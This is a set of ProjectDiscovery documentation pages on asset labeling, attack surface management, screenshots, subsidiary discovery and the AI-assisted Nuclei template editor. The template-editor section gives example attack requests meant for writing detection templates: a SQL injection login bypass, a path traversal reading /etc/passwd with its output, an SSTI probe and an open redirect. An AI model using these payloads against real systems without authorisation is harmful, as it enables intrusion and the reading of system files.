Teams can mark assets by environment (e.g., Development, Staging, Production) using custom labels. Bulk labeling makes it easy to apply these environment tags en masse. For example, filtering by port 8088 and tagging those assets as "staging" is a quick way to group all staging assets. This segmentation allows different handling of assets based on environment – for instance, running more frequent scans on production assets or applying stricter monitoring to internal-only systems.
### Technology or Port-based Grouping
If many assets share a common attribute (such as a specific open port, technology, or domain pattern), you can filter them out and label them in bulk. For instance, label all assets running an outdated software version as "Legacy" or all assets on port 22 as "SSH-Servers." This practice helps in quickly identifying groups of assets that might require a specific security assessment or patching regimen. The filtering system supports multi-select and complex queries (e.g., all assets on either Nginx or Apache) to refine these groups.
### Dynamic Asset Groups for Monitoring
After labeling assets, those labels can be used to create saved views or dynamic subgroups in the platform. A dynamic subgroup is essentially a saved filter that updates automatically as assets change. For example, once you've labeled certain assets as "Critical", you could save a filter for `label = Critical`. As new assets get tagged with "Critical" (either through AI suggestions or manual labeling), they will automatically appear in that group. This is highly useful for workflows like continuous monitoring or targeted vulnerability scanning – you always have an up-to-date list of assets in that category without rebuilding queries.
### Prioritization and Triage
Custom labels can encode business context such as ownership (e.g., tagging an asset with the responsible team or project name) or criticality (e.g., High-Value, Low-Impact). Using bulk operations, a newly onboarded set of assets can quickly be labeled according to input from asset owners or CMDB data. Thereafter, security analysts can filter by these labels to prioritize issues. For example, during incident response or risk review, one might focus on assets labeled "Production" and "Customer-Facing" first, since an issue on those could be more severe.
# AI-Powered Asset Labeling
Source: https://docs.projectdiscovery.io/cloud/assets/labeling
Automatically categorize and contextualize your assets with AI-driven labeling
Asset labeling is currently in early beta and operates asynchronously. The initial labeling process may take some time as we optimize performance. We're actively working on speed improvements to make this process faster and more efficient.
**Asset labeling** is the automated process of categorizing and contextualizing the assets discovered by ProjectDiscovery. Instead of presenting you with a raw list of domains or IPs, the platform intelligently **classifies assets** by attaching descriptive labels or tags to each one. These labels provide immediate context about what an asset is – for example, distinguishing a marketing website from an API endpoint or identifying a development server versus a production system. By automatically organizing assets into meaningful categories, asset labeling helps security teams understand their attack surface at a glance and focus on what matters most.
In practical terms, once ProjectDiscovery discovers an asset, it will evaluate that asset's characteristics and assign labels that describe its role or nature. For instance, a web application login page might be labeled as a "Login Portal," or a host with a name like *staging.example.com* might get tagged as "Staging Environment" to indicate it's not a production system. Asset labeling bridges the gap between raw asset data and the business context behind those assets, making your asset inventory more informative and easier to navigate.
## How It Works
ProjectDiscovery's asset labeling engine classifies assets by analyzing various pieces of information collected during discovery. It uses a combination of asset metadata, DNS information, HTTP responses, and even screenshots to determine how to label each asset:
* **Asset Metadata:** Basic details about the asset (such as IP addresses, open ports, SSL certificate data, and hosting information) are examined for clues. For example, an SSL certificate's Common Name might reveal the application's name, or an IP's ASN could indicate the cloud provider or organization owning the asset. This metadata helps identify what the asset might be (e.g., a cloud storage bucket, a VPN gateway, etc.) and adds context for labeling.
* **DNS Records:** DNS information is used to infer the asset's purpose or ownership. The domain or subdomain names can be very telling. For instance, an asset under `dev.` or `staging.` subdomains suggests a non-production environment, whereas something like `mail.example.com` could indicate an email server. CNAME records might point to a known service (for example, a CNAME to a SaaS provider's domain), which the platform can recognize and label accordingly. In short, ProjectDiscovery looks at hostnames and DNS details to glean context (like environment, service type, or associated product) that inform the asset's label.
* **HTTP Responses:** For web assets, the content and behavior of the HTTP(S) service are analyzed. The platform uses its HTTP probing capabilities to gather response headers, status codes, and page content. This includes looking at the HTML title, body text, and other fingerprints. Certain keywords or patterns can identify the application type – for example, a page title containing "Login" or a form with password fields likely indicates a login portal, while a default page saying "Welcome to nginx" indicates a generic web server instance. The system also detects technologies and frameworks running on the asset (e.g., identifying a WordPress site or an Apache server from response signatures) via deep technology fingerprinting. All this HTTP-derived information feeds into the labeling decision.
* **Screenshots:** ProjectDiscovery can capture screenshots of discovered web services. These screenshots provide a visual snapshot of the asset's interface. In the asset labeling process, screenshots serve as an additional data point for understanding the asset. For example, a screenshot that shows a login screen or an admin panel UI is a strong indicator of the asset's function (even if the text wasn't conclusive). While the labeling at this beta stage is mostly driven by metadata and textual analysis, having a screenshot means that if automated logic doesn't perfectly categorize an asset, an analyst can quickly glance at the image and understand what the asset is.
Behind the scenes, all these inputs are combined to assign one or multiple labels to the asset. The system uses a rules-based approach (and will continue to get smarter over time) to match patterns or signatures with label categories. For example, if an asset's DNS name contains "api" and the HTTP response returns JSON, a rule might label it as an "API Endpoint." Similarly, a host identified to be running Jenkins (via tech fingerprinting of HTTP response) might get a label like "Jenkins CI" to denote it's a CI/CD service. Each label is essentially a quick descriptor that summarizes an aspect of the asset, allowing you to immediately understand its nature without deep manual investigation.
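The sketch below is an illustrative rule of that kind, not ProjectDiscovery's actual engine; the function name and inputs are hypothetical:

```python
# Illustrative rules-based labeling, mirroring the examples described above.
def label_asset(hostname, content_type, page_title):
    labels = []
    # DNS name contains "api" and the HTTP response is JSON -> "API Endpoint"
    if "api" in hostname.lower() and "application/json" in content_type.lower():
        labels.append("API Endpoint")
    # dev./staging. subdomains suggest a non-production environment
    if hostname.lower().startswith(("dev.", "staging.")):
        labels.append("Staging Environment")
    # a "Login" title is a strong hint of a login portal
    if "login" in page_title.lower():
        labels.append("Login Portal")
    return labels

print(label_asset("api.example.com", "application/json", ""))         # ['API Endpoint']
print(label_asset("staging.example.com", "text/html", "Login page"))  # ['Staging Environment', 'Login Portal']
```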
## Benefits of Automated Labeling
Automated asset labeling brings several advantages to security professionals and engineers managing a large number of assets:
* **Reduces Manual Effort:** One of the biggest benefits is cutting down the tedious work of labeling assets by hand. In the past, teams might maintain spreadsheets or use tagging systems to mark which assets are production, which are internal, which belong to a certain team, etc. ProjectDiscovery's automated approach does this heavy lifting for you. As soon as assets are discovered, the platform annotates them with relevant labels, sparing you from examining each asset individually and typing out tags. This automation frees up your time to focus on higher-value tasks like analyzing findings or improving security controls.
* **Speeds Up Security Triage:** With assets automatically categorized, you can prioritize and triage security issues faster. When a new vulnerability or incident is reported, having labeled assets means you instantly know the context. For example, if an alert comes in for *api.test.example.com*, an "API" label and perhaps a "Staging" label on that asset will tell you it's a staging API server. You can then decide the urgency (maybe lower than a production issue) and the appropriate team to notify. Without having to dig for this information, response times improve. In short, labels act as immediate context clues that help you quickly determine the criticality of an asset and the impact of any associated vulnerabilities.
* **Better Asset Management & Organization:** Asset labels make it much easier to organize and filter your asset inventory. You can group assets by their labels to get different views of your attack surface. For instance, you might filter to see all assets labeled "Production" to ensure you're focusing scans and monitoring on live customer-facing systems, or you might pull up all assets labeled "Login Portal" to review authentication points in your infrastructure. This capability turns a flat list of assets into a richly organized dataset that can be sliced and diced for various purposes. It enhances visibility across your environment – you can quickly answer questions like "How many external login pages do we have?" or "Which assets are running database services?" if such labels are applied. Ultimately, this leads to more structured and efficient asset management.
* **Consistency and Scale:** Automated labeling applies the same criteria uniformly across all assets, ensuring consistent classification. Human tagging can be subjective – different team members might label similar assets differently or overlook some assets entirely. With ProjectDiscovery doing it automatically, every asset is evaluated with the same logic, and nothing gets skipped due to oversight. This consistency is especially important when you have hundreds or thousands of assets in dynamic cloud environments. The feature scales effortlessly – no matter how many assets you discover overnight, each will get labeled without adding to anyone's workload. As your attack surface grows, automated labeling keeps the context up-to-date continuously, which is crucial for maintaining an accurate asset inventory in fast-changing environments.
In summary, automated asset labeling streamlines asset management by eliminating manual tagging drudgery, accelerating the interpretation of asset data, and bringing order and clarity to your inventory. It's an efficiency boost that also improves the quality of your security posture by ensuring you always know what each asset is and why it's there.
# Asset Discovery and Exposure Management
Source: https://docs.projectdiscovery.io/cloud/assets/overview
Next-generation attack surface management and asset discovery platform
Attack Surface Management (ASM) has evolved from basic asset enumeration into a sophisticated process that continuously discovers, classifies, and monitors all assets vulnerable to attack. Modern organizations face ever‐expanding digital footprints spanning traditional internet-facing systems, dynamic cloud environments, and complex distributed services. ProjectDiscovery redefines ASM by combining proven open‑source techniques with advanced cloud‑native capabilities. This unified platform delivers instant insights—through a search‑like experience and deep reconnaissance—ensuring comprehensive coverage and real‑time visibility into your entire infrastructure. In essence, it lets your security team see your organization's attack surface as an attacker would, leaving no blind spots.
This document outlines the core workflows and architectural components of ProjectDiscovery's ASM and Exposure Management. It is designed to help new users quickly understand how the system works and to provide a structured, yet developer‑friendly, overview for security and engineering teams.
***
## Platform Architecture
Our next‑generation asset discovery platform is built on a revolutionary three‑layer architecture developed through extensive collaboration with hundreds of security teams. Each layer plays a distinct role in mapping and monitoring your infrastructure.
### 1. External Discovery Layer
* **Instant Enumeration:** Leveraging our enhanced Chaos database, this layer delivers immediate results through pre‑indexed data for hundreds of thousands of domains.
* **Deep Reconnaissance:** Active reconnaissance methods (advanced DNS brute‑forcing, permutation analysis, certificate transparency log monitoring) supplement instant results.
* **ASN Mapping:** Sophisticated ASN correlation (ASNMap) uncovers hidden relationships by mapping IP ranges associated with your organization. This network‑level insight expands your visibility beyond known domains.
* **Third‑Party Data & Subsidiary Discovery:** Integration with external sources (e.g., Shodan, Censys, FOFA) and subsidiary detection mechanisms automatically identify related brands and assets—ensuring that acquired or lesser‑known entities are not overlooked.
### 2. Cloud Integration Layer
* **Real‑Time Cloud Asset Discovery:** Our enhanced Cloudlist engine connects natively with AWS, Azure, GCP, and more, continuously monitoring your cloud footprint.
* **Service & Configuration Monitoring:** Advanced heuristics identify exposed services and risky configurations in real‑time, while persistent API connections ensure your cloud inventory stays up‑to‑date.
* **Cross‑Cloud Correlation:** Cloud‑based assets are linked with ASN data and external discoveries to provide a unified view of your overall attack surface.
### 3. Asset Management Layer
* **Enrichment & Classification:** Raw asset data is transformed through multi‑stage analysis. Comprehensive DNS analysis, HTTP probing (with screenshots and technology fingerprinting), and certificate evaluation work together to create detailed asset profiles.
* **Automated Labeling:** AI‑powered models automatically categorize and tag assets based on their characteristics, behavior patterns, and risk profiles. Users can also define custom labels and apply bulk labeling to further organize assets by environment, ownership, or risk.
* **Graph‑Based Relationship Mapping:** Advanced mapping visualizes complex asset relationships and attack paths, providing actionable intelligence for prioritizing security efforts.
***
## Key Workflows & Features
* Automatically discover and track all external-facing and internal assets using integrated tools like Subfinder, Naabu, Httpx, and more
* Organize assets with AI-generated and custom labels for efficient management and prioritization
* Capture visual snapshots of web assets for quick identification of exposed interfaces
* Automatically map and manage assets across multiple subsidiaries and brands
* Native integration with major cloud providers for comprehensive asset discovery
* Seamless integration with Nuclei-powered scanning for comprehensive security assessment
***
## Best Practices & Next Steps
* **Enable Continuous Scanning:** Schedule regular asset discovery and vulnerability scans to ensure your inventory remains current.
* **Leverage Labels Effectively:** Develop a consistent labeling scheme that reflects your organizational structure (e.g. by environment, department, or risk level) to prioritize remediation efforts.
* **Integrate with Your Workflow:** Set up integrations with alerting systems (Slack, Teams, email) and ticketing tools (Jira, GitHub) to automate notifications and track remediation.
* **Review & Update Regularly:** Periodically audit your asset inventory to remove stale entries and adjust labels as your infrastructure evolves.
* **Explore Advanced Features:** Once you're comfortable with the basics, dive into additional features such as customized filtering, dynamic grouping, and deeper cloud integrations to further refine your exposure management.
***
By following this guide, new users can quickly grasp the full capabilities of ProjectDiscovery's ASM and Exposure Management. The integrated workflows—from asset discovery and enrichment to continuous monitoring and vulnerability assessment—provide a robust, real‑time view of your infrastructure, empowering your security team to proactively secure your attack surface. Enjoy the streamlined, automated approach to managing your organization's exposure with ProjectDiscovery!
# Asset Screenshots
Source: https://docs.projectdiscovery.io/cloud/assets/screenshots
Visual catalog of your discovered assets for quick security assessment
The Screenshots feature is currently in beta and operates asynchronously. After asset discovery, there may be a delay before screenshots become available as they are processed in the background. This current limitation is temporary while we work on infrastructure optimizations to make screenshot generation instant.
We are actively working on:
* Reducing screenshot generation time
* Implementing real-time processing
* Scaling our infrastructure to handle concurrent screenshot requests
* Making the feature more widely available to all users
During the beta period, you may experience longer wait times for screenshots to appear in your dashboard. We appreciate your patience as we enhance this feature to provide instant visual insights for all users.
The *Screenshots* feature automatically captures and catalogs visual snapshots of web assets identified during your discovery process. In practice, this means that for each discovered web service, an image of its web page is saved for you to review. These screenshots provide a quick visual summary of what was found, allowing you to identify interesting or anomalous web pages at a glance. All captured images are organized alongside asset data, so security teams can easily browse them without manually visiting each site.
**How this helps:** By seeing the actual rendered pages, you can spot login portals, dashboards, error pages, or other telling visuals immediately. This added context enriches your asset inventory beyond raw URLs and metadata, giving you an at-a-glance understanding of each asset's interface and content.
## How It Works (Technical Process)
Under the hood, the screenshot feature uses a headless browser to load each web page and take a snapshot of it. When asset discovery with screenshots is initiated, the system will launch a browser engine (Chrome in headless mode) to fully render the target page (including HTML, CSS, and JavaScript) before capturing the image. Because of this rendering step, screenshot generation is **resource-intensive** and **time-consuming**. Each page needs to load as if you opened it in a real browser, which introduces processing delays.
In the current beta implementation, screenshots are taken **asynchronously**. This means the initial asset discovery can complete and return results before all screenshots are finished. The images will continue to be captured in the background and will appear in your asset catalog once ready. As a result, you might notice a gap between discovering an asset and seeing its screenshot. This is normal in the beta – the feature prioritizes completing the discovery process first, then works on rendering pages for snapshots.
## Why Use Screenshots?
Traditionally, after discovering new web assets, security engineers would **manually inspect** each site to understand what it is. This might involve copying URLs into a browser or using separate tools to capture site images. For large numbers of assets, that manual approach is tedious and time‑consuming. Important details could be missed if an analyst doesn't have time to check every single site.
The screenshots feature automates this **visual assessment** step. Instead of manually visiting dozens or hundreds of websites, the system automatically provides you with a gallery of each site's front page. This saves considerable time and effort – without automation, teams often had to write custom scripts (for example, using Selenium to take browser snapshots) or even rerun their discovery with a separate screenshot tool just to capture images. Now, that process is integrated: as soon as an asset is found, a screenshot is queued up for it. Security teams can quickly scroll through the captured images to triage assets, prioritize investigation, and spot anything visually unusual or interesting. In essence, **Screenshots turn a once-manual, one-by-one review into an automated, at-scale process**, letting you cover more ground faster.
**Use case example:** If your discovery process finds an unknown subdomain hosting a login page, the screenshot will show you the login form and branding. This immediate context might tell you that the site is an admin portal, which is valuable information for risk assessment. Without the screenshot, you might have overlooked that subdomain or delayed investigating it until you could manually check it. By automating this, the feature ensures no discovered web asset goes visually unchecked.
# Subsidiary & Multi-Organization Management
Source: https://docs.projectdiscovery.io/cloud/assets/subsidiary
Discover and manage assets across multiple organizations, subsidiaries, and brands
Need advanced workflows or custom subsidiary management? Our team can help set up enterprise-grade configurations tailored to your infrastructure. [Talk to our team](https://projectdiscovery.io/request-demo) to discuss your specific requirements.
Modern enterprises frequently have complex infrastructures spread across many domains and business units. ProjectDiscovery's platform is designed to give security teams **instant visibility into the entire organizational attack surface**, including assets belonging to subsidiaries, acquired companies, and separate brands. It does so by automating asset discovery and correlation on a global scale. The platform acts as a centralized inventory where all web properties, cloud resources, and external facing systems tied to an organization are cataloged together, regardless of which subsidiary or team they belong to.
ProjectDiscovery built its cloud platform with **end-to-end exposure management workflows** that continuously discover assets and monitor them in real-time. This means as your organization grows – launching new websites, spinning up cloud services, or acquiring companies – the platform automatically updates your asset inventory and keeps track of new potential entry points. In short, ProjectDiscovery provides a *"single pane of glass"* for enterprise security teams to oversee multi-organization infrastructures.
## Challenges in Traditional Subsidiary Asset Discovery
Tracking assets across multiple organizations or subsidiaries is notoriously difficult when done manually. Security teams traditionally had to compile lists of subsidiary domains and networks from internal knowledge or public records, then run separate scans for each – a time-consuming and error-prone process. Some common challenges include:
* **Incomplete Visibility:** Large organizations might have dozens of subsidiaries or brand domains, and each may host numerous applications. Manually mapping all these entities is a huge challenge. In practice, many enterprises have "hundreds or even thousands of related entities," making it *"difficult to get a clear picture of their full attack surface"*. Important assets can be overlooked simply because they were not on the main corporate domain.
* **Constant Change:** Mergers, acquisitions, and divestitures mean the set of assets is constantly evolving. Without continuous updates, asset inventories become outdated quickly. IP addresses and domains can change ownership or get spun up and down rapidly in cloud environments. Keeping track of these changes manually is untenable.
* **Fragmented Data Sources:** Information about subsidiaries is often scattered (e.g. in financial databases, press releases, WHOIS records). As a result, mapping out which domains or systems are owned by your company (versus third parties) can require extensive research. This fragmentation leads to **blind spots** in security monitoring.
* **Risk of Unknown Assets:** Perhaps the biggest risk is that **unknown or unmanaged assets can lead to security incidents**. If a security team is only monitoring the primary organization's domains, a forgotten website under a subsidiary could become an easy target. As one security engineer described, without a centralized view "*new assets could pop up without our knowledge, creating potential vulnerabilities like subdomain takeovers*". In other words, attackers might exploit an obscure subsidiary's forgotten cloud bucket or an old acquisition's server if the defenders aren't even aware it exists.
These challenges mean that traditional approaches (spreadsheets of subsidiaries, manual scans, etc.) often fail to provide complete coverage. Security teams end up reactive – finding out about a subsidiary's exposure only after an incident or external report. Clearly, a more automated, scalable solution is needed for subsidiary and multi-organization asset management.
## How ProjectDiscovery Solves This Problem
ProjectDiscovery's platform introduces automated features that **eliminate the manual legwork** of subsidiary asset discovery. It leverages external data and intelligent correlation to map out an enterprise's entire digital footprint across all related organizations, with minimal user input. Key capabilities include:
* **Automated Subsidiary Correlation:** ProjectDiscovery integrates with the Crunchbase API to automatically identify which companies and domains are associated with your organization. As soon as you onboard, the platform pulls in known subsidiaries and related entities from Crunchbase's extensive corporate database. This means security teams *immediately* see a list of subsidiaries and their known domains without having to manually research corporate filings or news articles. By using this external intelligence, ProjectDiscovery can **map subsidiaries to assets** and help track associated assets across your entire corporate structure.
* **Seamless Onboarding of Subsidiary Assets:** The platform presents this extended view during onboarding – giving users an instant snapshot of their organization's broad footprint as they set up their account. Instead of starting with a blank slate, an enterprise user logging into ProjectDiscovery for the first time might immediately see that the platform has identified, for example, *"SubsidiaryX.com, SubsidiaryY.net, and BrandZ.com"* as belonging to their company. This **jump-starts the asset inventory** by automatically including the web properties of all child organizations. Such visibility, right at onboarding, ensures no major branch of the business is initially overlooked.
* **Recognition of Brands and Owned Domains:** Subsidiary discovery in ProjectDiscovery isn't limited to exact company names – it also helps surface related domains or brands. For example, if your organization owns multiple product brands each with their own website, the platform can recognize those as part of your attack surface. It correlates various clues (DNS records, SSL certificates, WHOIS info, etc.) to cluster assets by ownership. As a result, security teams get a unified view of everything "owned" by the broader organization, even if operated under different names.
* **Continuous Enrichment and Updates:** ProjectDiscovery's asset correlation is not a one-time static pull. It is continuously being enhanced. Upcoming improvements will use **reverse WHOIS lookups** to find additional owned domains and associated entities that might not be obvious from corporate listings. This will further expand coverage by catching assets that share registration details or contact emails with the organization. The platform is also opening up these discovery capabilities via API for the community, so its subsidiary detection engine will keep getting smarter over time. For the security team, this means the asset inventory grows and updates automatically as new information surfaces – without manual effort.
By automating subsidiary and multi-organization asset discovery, ProjectDiscovery **saves countless hours** of manual mapping and drastically reduces the chances of missing a part of your attack surface. Security teams no longer need to maintain separate inventories or perform ad-hoc research whenever the company expands; the platform handles it for them in the background. All assets across the parent company and its subsidiaries funnel into one consolidated inventory for monitoring.
# AI Assistance
Source: https://docs.projectdiscovery.io/cloud/editor/ai
Review details on using AI to help generate templates for Nuclei and ProjectDiscovery
[The Template Editor](https://cloud.projectdiscovery.io/) includes AI assistance for generating templates from vulnerability reports. This document guides you through the process, offering usage tips and examples.
## Overview
Powered by ProjectDiscovery's deep library of public Nuclei templates and a rich CVE data set, the AI understands a broad array of security vulnerabilities. First, the system interprets the user's prompt to identify a specific vulnerability. Then, it generates a template based on the steps required to reproduce the vulnerability, along with the meta information needed to reproduce and remediate the issue.
## Initial Setup
Kick start your AI Assistance experience with these steps:
1. **Provide Detailed Information**: Construct comprehensive Proof of Concepts (PoCs) for vulnerabilities such as Cross-Site Scripting (XSS).
2. **Understand the Template Format**: Get to grips with the format to appropriately handle and modify the generated template.
3. **Validation and Linting**: Use the integrated linter to guarantee the template's validity.
4. **Test the Template**: Evaluate the template against a test target ensuring its accuracy.
## Best Practices
* **Precision Matters**: Detailed prompts yield superior templates.
* **Review and Validate**: Consistently check matchers' accuracy.
* **Template Verification**: Validate the template on known vulnerable targets before deployment.
## Example Prompts
The following examples demonstrate different vulnerabilities and the corresponding prompts.
Open redirect vulnerability identified in a web application. Here's the PoC:
HTTP Request:
```
GET /redirect?url=http://malicious.com HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
```
HTTP Response:
```
HTTP/1.1 302 Found
Location: http://malicious.com
Content-Length: 0
Server: Apache
```
The application redirects the user to the URL specified in the url parameter, leading to an open redirect vulnerability.
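To give a sense of the output, a prompt like the one above would typically yield a standard Nuclei YAML template. The sketch below is purely illustrative; the template id, metadata, and matcher values are assumptions based on this PoC, not actual AI output:

```yaml
# Illustrative sketch only; values are assumptions based on the PoC above.
id: example-open-redirect

info:
  name: Open Redirect via url Parameter (example)
  author: your-name
  severity: medium
  description: The application redirects to the URL supplied in the url parameter.

http:
  - method: GET
    path:
      - "{{BaseURL}}/redirect?url=http://malicious.com"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302
      - type: regex
        part: header
        regex:
          - '(?i)location: http://malicious\.com'
```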
SQL Injection vulnerability in a login form. Here's the PoC:
HTTP Request:
```
POST /login HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

username=admin&password=' OR '1'='1
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome back, admin
...
```
The application improperly handles user input in the password field, leading to an SQL Injection vulnerability.
Business Logic vulnerability in a web application's shopping cart function allows for negative quantities, leading to credit. Here's the PoC:
HTTP Request:
```
POST /add-to-cart HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

product_id=1001&quantity=-1
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Product added to cart. Current balance: -$19.99
...
```
The application fails to validate the quantity parameter, resulting in a Business Logic vulnerability.
Server-side Template Injection (SSTI) vulnerability through a web application's custom greeting card function. Here's the PoC:
HTTP Request:
```
POST /create-card HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

message={{7*7}}
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Your card: 49
...
```
The application processes the message parameter as a template, leading to an SSTI vulnerability.
Insecure Direct Object Reference (IDOR) vulnerability discovered in a website's user profile page. Here's the PoC:
HTTP Request:
```
GET /profile?id=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Cookie: session=abcd1234
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome, otheruser
...
```
The application exposes sensitive information of a user (ID: 2) who is not the authenticated user (session: abcd1234), leading to an IDOR vulnerability.
Path Traversal vulnerability identified in a web application's file download function. Here's the PoC:
HTTP Request:
```
GET /download?file=../../etc/passwd HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1827
Server: Apache

root:x:0:0:root:/root:/bin/bash
```
The application fetches the file specified in the file parameter from the server file system, leading to a Path Traversal vulnerability.
Business logic vulnerability in a web application's VIP subscription function allows users to extend the trial period indefinitely. Here's the PoC:
HTTP Request:
```
POST /extend-trial HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Cookie: session=abcd1234
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache

Your VIP trial period has been extended by 7 days.
```
The application does not limit the number of times the trial period can be extended, leading to a business logic vulnerability.
Each of these examples provides HTTP Requests and Responses to illustrate the vulnerabilities.
## Limitations
Please note that the current AI is trained primarily on HTTP data. Template generation for non-HTTP protocols is not supported at this time. Support for additional protocols is under development and will be available soon.
# Templates & Editor FAQ
Source: https://docs.projectdiscovery.io/cloud/editor/faq
Answers to common questions about Nuclei templates and our cloud platform template editor
Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are the core of the Nuclei project and ProjectDiscovery Cloud Platform. The templates contain the actual logic that is executed in order to detect various vulnerabilities.
The ProjectDiscovery template library contains **several thousand** ready-to-use **[community-contributed](https://github.com/projectdiscovery/nuclei-templates/graphs/contributors)** vulnerability templates. We are continuously working with our open source community
to update and add templates as vulnerabilities are discovered.
We maintain a [template guide](/templates/introduction/) for writing new and custom Nuclei templates. ProjectDiscovery Cloud Platform also provides AI support to assist in writing and testing custom templates; check out our documentation on [AI Assistance](/cloud/editor/ai) for more information.
Performing security assessment of an application is time-consuming. It's always better and time-saving to automate steps whenever possible. Once you've found a security vulnerability, you can prepare a Nuclei template by defining the required HTTP request to reproduce the issue, and test the same vulnerability across multiple hosts with ease.
It's worth mentioning that **you write the template once and use it forever**, as you no longer need to test that specific vulnerability manually.
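As a rough illustration of that workflow, the sketch below encodes a reproduced HTTP request as a custom template. It assumes a hypothetical login endpoint and response string; swap in the request and matcher from the issue you actually reproduced:

```yaml
# Minimal illustrative sketch; the endpoint, payload, and matcher below
# are placeholders for your own finding.
id: my-custom-finding

info:
  name: Example Custom Finding
  author: your-team
  severity: high

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=' OR '1'='1
    matchers:
      - type: word
        part: body
        words:
          - "Welcome back"
```

Once saved, the same template can be run against a list of hosts with the open-source CLI, for example `nuclei -t my-custom-finding.yaml -l hosts.txt`.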
Here are a few examples from the community using templates to automate security findings:
* [https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/](https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/)
* [https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning](https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning)
* [https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites](https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites)
* [https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state](https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state)
* [https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out](https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out)
* [https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities](https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities)
Nuclei templates are selected as part of any scans you create. You can select pre-configured groups of templates, individual templates, or add your own custom templates as part of your scan configuration.
* Check out [the scanning documentation](/cloud/scanning/overview) to learn more.
You are always welcome to share your templates with the community. You can
either open a [GitHub
issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=nuclei-template&template=submit-template.md&title=%5Bnuclei-template%5D+template-name)
with the template details or open a GitHub [pull
request](https://github.com/projectdiscovery/nuclei-templates/pulls) with your
Nuclei templates. If you don't have a GitHub account, you can also make use of
the [discord server](https://discord.gg/projectdiscovery) to share the
template with us.
You own any templates generated by the AI through the Template Editor. They
are your property, and you are granted a perpetual license to use and modify
them as you see fit.
The Template Editor feature in PDCP uses OpenAI.
Yes, prompts are stored as part of the generated template metadata. This data
is deleted as soon as the template or the user is deleted.
The accuracy of the generated templates is primarily dependent on the detail
and specificity of the input you provide. The more detailed information you
supply, the better the AI can understand the context and create an accurate
template. However, as with any AI tool, it is highly recommended to review,
validate, and test any generated templates before using them in a live
environment.
No, the AI does not use the templates you generate for further training or
improvement of the AI model. The system only uses public templates and CVE
data for training, ensuring your unique templates remain confidential.
# Template Editor Overview
Source: https://docs.projectdiscovery.io/cloud/editor/overview
Learn more about using the Nuclei Templates Editor
For more in-depth information about Nuclei templates, including details on template structure and supported protocols, [check out our templates documentation](/templates/introduction).
[The Template Editor](https://cloud.projectdiscovery.io/public/public-template) is a multi-functional cloud-hosted tool designed for creating, running, and sharing templates (Nuclei and ProjectDiscovery). It's packed with helpful features for individual and professional users seeking to manage and execute templates.
![Templates Editor](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/images/editor.jpg)
## Template Compatibility
In addition to the Template Editor, our cloud platform supports any templates compatible with [Nuclei](/nuclei/overview). These templates use the same powerful YAML format supported by the open-source tools.
Take a look at our [Templates](/templates/introduction) documentation for a wealth of resources available around template design, structure, and how they can be customized to meet an enormous range of use cases. As always, if you have questions [we're here to help](/help/home).
## Features
Current and upcoming features:
| Feature | Description and Use | Availability |
| -------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ |
| **Editor** | Experience something akin to using VS Code with our integrated editor, built on top of Monaco. This feature allows easy writing and modification of Nuclei Templates. | Free |
| **Optimizer** | Leverage the in-built TemplateMan API to automatically lint, format, validate, and enhance your Nuclei Templates. | Free |
| **Scan (URL)** | Run your templates on a targeted URL to check their validity. | Free \* |
| **Debugger** | Utilize the in-built debugging function that displays requests and responses of your template scans, aiding troubleshooting and understanding template behavior. | Free |
| **Cloud Storage** | Store and access your Nuclei Templates securely anytime, anywhere using your account. | Free |
| **Sharing** | Share your templates for better collaboration by generating untraceable unique links. | Free |
| **AI Assistance** | Employ AI to craft Nuclei Templates based on the context of specified vulnerabilities. This simplifies template creation and minimizes the time required to write them. | Free \* |
| **Scan (LIST, CIDR, ASN)** | In the professional version, run scans on target lists, network ranges (CIDR), and AS numbers (ASN). | Teams |
| **REST API** | In the professional version, fetch templates, call the AI, and perform scans remotely using APIs. | Teams |
| **PDCP Sync** | Sync your generated templates with our cloud platform for easy access and management, available in the professional version. | Teams |
## Free Feature Limitations
Some features available within the free tier have usage caps in place:
* **Scan (URL):** You're allowed up to **100** scans daily.
* **AI Assistance:** Up to **10** queries can be made each day.
These limits reset daily and ensure system integrity and availability while providing access to key functions.
## How to Get Started
Begin by ensuring you have an account. If not, sign up on [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io/sign-up) and follow the steps below:
